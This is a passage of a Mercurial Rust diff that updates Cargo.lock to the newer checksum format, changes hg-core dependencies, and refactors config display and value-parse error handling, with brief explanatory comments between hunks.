- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 0.1.10",
+ "rand 0.7.3",
+ "static_assertions",
]
[[package]]
name = "typenum"
version = "1.12.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33"
[[package]]
name = "unicode-width"
version = "0.1.8"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3"
[[package]]
name = "unicode-xid"
version = "0.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564"
+
+[[package]]
+name = "users"
+version = "0.11.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032"
+dependencies = [
+ "libc",
+ "log",
+]
[[package]]
name = "vcpkg"
version = "0.2.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb"
[[package]]
name = "vec_map"
version = "0.8.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191"
[[package]]
name = "version_check"
version = "0.9.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed"
[[package]]
name = "wasi"
version = "0.9.0+wasi-snapshot-preview1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519"
[[package]]
name = "wasi"
version = "0.10.0+wasi-snapshot-preview1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f"
[[package]]
name = "winapi"
version = "0.3.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
dependencies = [
- "winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi-i686-pc-windows-gnu",
+ "winapi-x86_64-pc-windows-gnu",
]
[[package]]
name = "winapi-i686-pc-windows-gnu"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
[[package]]
name = "winapi-util"
version = "0.1.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178"
dependencies = [
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi",
]
[[package]]
name = "winapi-x86_64-pc-windows-gnu"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
[[package]]
name = "zstd"
version = "0.5.3+zstd.1.4.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8"
dependencies = [
- "zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "zstd-safe",
]
[[package]]
name = "zstd-safe"
version = "2.0.5+zstd.1.4.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "zstd-sys",
]
[[package]]
name = "zstd-sys"
version = "1.4.17+zstd.1.4.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b"
dependencies = [
- "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)",
- "glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cc",
+ "glob",
+ "itertools",
+ "libc",
]
-
-[metadata]
-"checksum adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e"
-"checksum aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)" = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5"
-"checksum ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b"
-"checksum atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8"
-"checksum autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a"
-"checksum bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693"
-"checksum bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2"
-"checksum byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de"
-"checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48"
-"checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822"
-"checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
-"checksum clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)" = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002"
-"checksum const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826"
-"checksum cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95"
-"checksum crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a"
-"checksum crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87"
-"checksum crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775"
-"checksum crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9"
-"checksum crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d"
-"checksum crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)" = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8"
-"checksum crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)" = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d"
-"checksum ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)" = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484"
-"checksum difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198"
-"checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457"
-"checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36"
-"checksum flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)" = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129"
-"checksum format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)" = "1a7374eb574cd29ae45878554298091c554c3286a17b3afa440a3e2710ae0790"
-"checksum format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "4edcc04201cea17a0e6b937adebd46b93fba09924c7e6ed8c515a35ce8432cbc"
-"checksum fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba"
-"checksum gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)" = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2"
-"checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6"
-"checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574"
-"checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8"
-"checksum hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "644f9158b2f133fd50f5fb3242878846d9eb792e445c893805ff0e3824006e35"
-"checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f"
-"checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f"
-"checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b"
-"checksum jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)" = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2"
-"checksum lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646"
-"checksum libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)" = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb"
-"checksum libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655"
-"checksum log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)" = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b"
-"checksum maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00"
-"checksum memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525"
-"checksum memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)" = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b"
-"checksum memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87"
-"checksum micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c"
-"checksum micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d"
-"checksum miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)" = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d"
-"checksum num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290"
-"checksum num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)" = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3"
-"checksum output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9"
-"checksum pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)" = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c"
-"checksum ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)" = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857"
-"checksum pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427"
-"checksum proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)" = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5"
-"checksum proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)" = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71"
-"checksum python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c"
-"checksum python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4"
-"checksum quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0"
-"checksum quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)" = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37"
-"checksum rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)" = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c"
-"checksum rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)" = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293"
-"checksum rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)" = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03"
-"checksum rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402"
-"checksum rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b"
-"checksum rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc"
-"checksum rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19"
-"checksum rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2"
-"checksum rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c"
-"checksum rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429"
-"checksum rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004"
-"checksum rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674"
-"checksum rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a"
-"checksum rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2"
-"checksum redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)" = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce"
-"checksum regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c"
-"checksum regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)" = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189"
-"checksum remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7"
-"checksum rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)" = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a"
-"checksum rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)" = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda"
-"checksum same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)" = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502"
-"checksum scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd"
-"checksum sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)" = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f"
-"checksum static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f"
-"checksum strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a"
-"checksum syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)" = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44"
-"checksum tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9"
-"checksum termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4"
-"checksum textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060"
-"checksum thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14"
-"checksum time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255"
-"checksum twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)" = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59"
-"checksum typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)" = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33"
-"checksum unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)" = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3"
-"checksum unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564"
-"checksum vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)" = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb"
-"checksum vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191"
-"checksum version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)" = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed"
-"checksum wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f"
-"checksum wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519"
-"checksum winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)" = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
-"checksum winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
-"checksum winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)" = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178"
-"checksum winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
-"checksum zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8"
-"checksum zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055"
-"checksum zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b"
--- a/rust/hg-core/Cargo.toml Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/Cargo.toml Tue Apr 20 11:01:06 2021 -0400
@@ -9,11 +9,12 @@
name = "hg"
[dependencies]
+bytes-cast = "0.1"
byteorder = "1.3.4"
-hex = "0.4.2"
+derive_more = "0.99"
+home = "0.5"
im-rc = "15.0.*"
lazy_static = "1.4.0"
-memchr = "2.3.3"
rand = "0.7.3"
rand_pcg = "0.2.1"
rand_distr = "0.2.2"
@@ -27,7 +28,7 @@
memmap = "0.7.0"
zstd = "0.5.3"
rust-crypto = "0.2.36"
-format-bytes = "0.1.2"
+format-bytes = "0.2.2"
# We don't use the `miniz-oxide` backend, so as not to change rhg benchmarks
# until we have a clearer view of which backend is the fastest.
@@ -40,9 +41,3 @@
clap = "*"
pretty_assertions = "0.6.1"
tempfile = "3.1.0"
-
-[features]
-# Use a (still unoptimized) tree for the dirstate instead of the current flat
-# dirstate. This is not yet recommended for performance reasons. A future
-# version might make it the default, or make it a runtime option.
-dirstate-tree = []
--- a/rust/hg-core/examples/nodemap/main.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/examples/nodemap/main.rs Tue Apr 20 11:01:06 2021 -0400
@@ -49,7 +49,7 @@
fn query(index: &Index, nm: &NodeTree, prefix: &str) {
let start = Instant::now();
- let res = nm.find_hex(index, prefix);
+ let res = NodePrefix::from_hex(prefix).map(|p| nm.find_bin(index, p));
println!("Result found in {:?}: {:?}", start.elapsed(), res);
}
@@ -66,7 +66,7 @@
.collect();
if queries < 10 {
let nodes_hex: Vec<String> =
- nodes.iter().map(|n| n.encode_hex()).collect();
+ nodes.iter().map(|n| format!("{:x}", n)).collect();
println!("Nodes: {:?}", nodes_hex);
}
let mut last: Option<Revision> = None;
@@ -76,11 +76,11 @@
}
let elapsed = start.elapsed();
println!(
- "Did {} queries in {:?} (mean {:?}), last was {:?} with result {:?}",
+ "Did {} queries in {:?} (mean {:?}), last was {:x} with result {:?}",
queries,
elapsed,
elapsed / (queries as u32),
- nodes.last().unwrap().encode_hex(),
+ nodes.last().unwrap(),
last
);
}
--- a/rust/hg-core/src/config.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/config.rs Tue Apr 20 11:01:06 2021 -0400
@@ -11,4 +11,6 @@
mod config;
mod layer;
-pub use config::Config;
+mod values;
+pub use config::{Config, ConfigValueParseError};
+pub use layer::{ConfigError, ConfigParseError};
--- a/rust/hg-core/src/config/config.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/config/config.rs Tue Apr 20 11:01:06 2021 -0400
@@ -8,25 +8,44 @@
// GNU General Public License version 2 or any later version.
use super::layer;
-use crate::config::layer::{ConfigError, ConfigLayer, ConfigValue};
-use std::path::PathBuf;
+use super::values;
+use crate::config::layer::{
+ ConfigError, ConfigLayer, ConfigOrigin, ConfigValue,
+};
+use crate::utils::files::get_bytes_from_os_str;
+use crate::utils::SliceExt;
+use format_bytes::{write_bytes, DisplayBytes};
+use std::collections::HashSet;
+use std::env;
+use std::fmt;
+use std::path::{Path, PathBuf};
+use std::str;
-use crate::operations::find_root;
-use crate::utils::files::read_whole_file;
+use crate::errors::{HgResultExt, IoResultExt};
/// Holds the config values for the current repository
/// TODO update this docstring once we support more sources
+#[derive(Clone)]
pub struct Config {
layers: Vec<layer::ConfigLayer>,
}
-impl std::fmt::Debug for Config {
- fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+impl DisplayBytes for Config {
+ fn display_bytes(
+ &self,
+ out: &mut dyn std::io::Write,
+ ) -> std::io::Result<()> {
for (index, layer) in self.layers.iter().rev().enumerate() {
- write!(
- f,
- "==== Layer {} (trusted: {}) ====\n{:?}",
- index, layer.trusted, layer
+ write_bytes!(
+ out,
+ b"==== Layer {} (trusted: {}) ====\n{}",
+ index,
+ if layer.trusted {
+ &b"yes"[..]
+ } else {
+ &b"no"[..]
+ },
+ layer
)?;
}
Ok(())
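
Replacing `std::fmt::Debug` with `DisplayBytes` lets the config be dumped without assuming values are valid UTF-8. As a rough sketch of the trait contract — assuming only the format-bytes 0.2 API already visible in this hunk (`DisplayBytes`, `display_bytes`, and the `write_bytes!` macro), with a made-up `Pair` type — an implementation might look like:

    use format_bytes::{write_bytes, DisplayBytes};

    struct Pair {
        key: Vec<u8>,
        value: Vec<u8>,
    }

    impl DisplayBytes for Pair {
        fn display_bytes(
            &self,
            out: &mut dyn std::io::Write,
        ) -> std::io::Result<()> {
            // Unlike std::fmt::Display, nothing here requires UTF-8.
            write_bytes!(out, b"{}={}\n", &self.key[..], &self.value[..])
        }
    }

    fn main() -> std::io::Result<()> {
        let pair = Pair {
            key: b"ui.editor".to_vec(),
            value: b"vim".to_vec(),
        };
        pair.display_bytes(&mut std::io::stdout())
    }
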
@@ -40,15 +59,176 @@
Parsed(layer::ConfigLayer),
}
-pub fn parse_bool(v: &[u8]) -> Option<bool> {
- match v.to_ascii_lowercase().as_slice() {
- b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true),
- b"0" | b"no" | b"false" | b"off" | b"never" => Some(false),
- _ => None,
+#[derive(Debug)]
+pub struct ConfigValueParseError {
+ pub origin: ConfigOrigin,
+ pub line: Option<usize>,
+ pub section: Vec<u8>,
+ pub item: Vec<u8>,
+ pub value: Vec<u8>,
+ pub expected_type: &'static str,
+}
+
+impl fmt::Display for ConfigValueParseError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ // TODO: add origin and line number information, here and in
+ // corresponding python code
+ write!(
+ f,
+ "config error: {}.{} is not a {} ('{}')",
+ String::from_utf8_lossy(&self.section),
+ String::from_utf8_lossy(&self.item),
+ self.expected_type,
+ String::from_utf8_lossy(&self.value)
+ )
}
}
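
With this `Display` implementation, a failed typed lookup renders as, for example, `config error: ui.timeout is not a valid integer ('soon')`. A small sketch, buildable only inside hg-core where `ConfigOrigin` is in scope, and with entirely made-up field values:

    let err = ConfigValueParseError {
        origin: ConfigOrigin::CommandLine,
        line: None,
        section: b"ui".to_vec(),
        item: b"timeout".to_vec(),
        value: b"soon".to_vec(),
        expected_type: "valid integer",
    };
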